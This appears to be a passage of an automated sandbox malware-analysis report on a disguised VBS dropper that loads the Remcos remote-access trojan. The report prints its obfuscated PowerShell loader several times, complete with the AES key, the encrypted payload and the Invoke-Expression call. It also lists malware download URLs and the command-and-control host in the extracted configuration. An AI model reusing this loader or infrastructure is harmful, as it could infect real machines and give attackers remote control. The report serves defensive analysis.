TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", ProcessId: 1904, ProcessName: wscript.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs", ProcessId: 1904, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'

                  Stealing of Sensitive Information

                  barindex
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 77 A9 80 9E 90 2C B8 6C 51 BA A5 B2 8E A0 16 C7 79 D0 CC 92 08 78 EC 20 68 CF E2 8F A1 4B DE A4 4E 3B 44 07 84 89 BB 52 B7 F6 66 B9 84 EE 49 49 A7 72 B3 8C 9D E0 39 B5 2D C9 20 F9 BF 26 10 6C 21 F5 FC 78 E6 40 52 82 2A 39 1D 19 F1 FC 37 85 40 FD 38 55 FE 96 C3 B0 43 02 77 EB 3D 1C 38 07 1B 75 19 AC EF 04 FA 29 66 07 FE 4F 4E D5 08 7D 33 BA , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 6048, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-R2I0JW\exepath
                  No Snort rule has matched
                  Timestamp:2024-07-27T13:33:04.956471+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:54705
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T13:32:11.251710+0200
                  SID:2036594
                  Source Port:49701
                  Destination Port:14645
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-07-27T13:32:08.868194+0200
                  SID:2049038
                  Source Port:80
                  Destination Port:49699
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T13:32:24.217562+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49703
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T13:32:07.798035+0200
                  SID:2047750
                  Source Port:80
                  Destination Port:49699
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-27T13:32:09.837630+0200
                  SID:2020424
                  Source Port:80
                  Destination Port:49700
                  Protocol:TCP
                  Classtype:Exploit Kit Activity Detected
                  Timestamp:2024-07-27T13:32:13.238777+0200
                  SID:2803304
                  Source Port:49702
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Unknown Traffic

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
                  Source: http://192.3.176.154/xampp/glo/KBV.txtAvira URL Cloud: Label: malware
                  Source: 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "2024remcmon.duckdns.org:14645:1", "Assigned name": "zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R2I0JW", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: 2024remcmon.duckdns.orgVirustotal: Detection: 13%Perma Link
                  Source: http://198.46.176.133/Upload/vbs.jpegVirustotal: Detection: 19%Perma Link
                  Source: 2024remcmon.duckdns.orgVirustotal: Detection: 13%Perma Link
                  Source: http://198.46.176.133Virustotal: Detection: 13%Perma Link
                  Source: createactiveimagesbeautygirlfrnd.gIF.vbsVirustotal: Detection: 12%Perma Link
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2488829216.000000000122B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6048, type: MEMORYSTR
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00433837
                  Source: powershell.exe, 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_e4f0aa71-b

                  Exploits

                  barindex
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.246346ad908.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246335CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1328673356.00000246343D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6048, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004074FD _wcslen,CoGetObject,4_2_004074FD
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000002.00000002.1364665086.000002463BCE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.1328673356.000002463362F000.00000004.00000800.00020000.00000000.sdmp
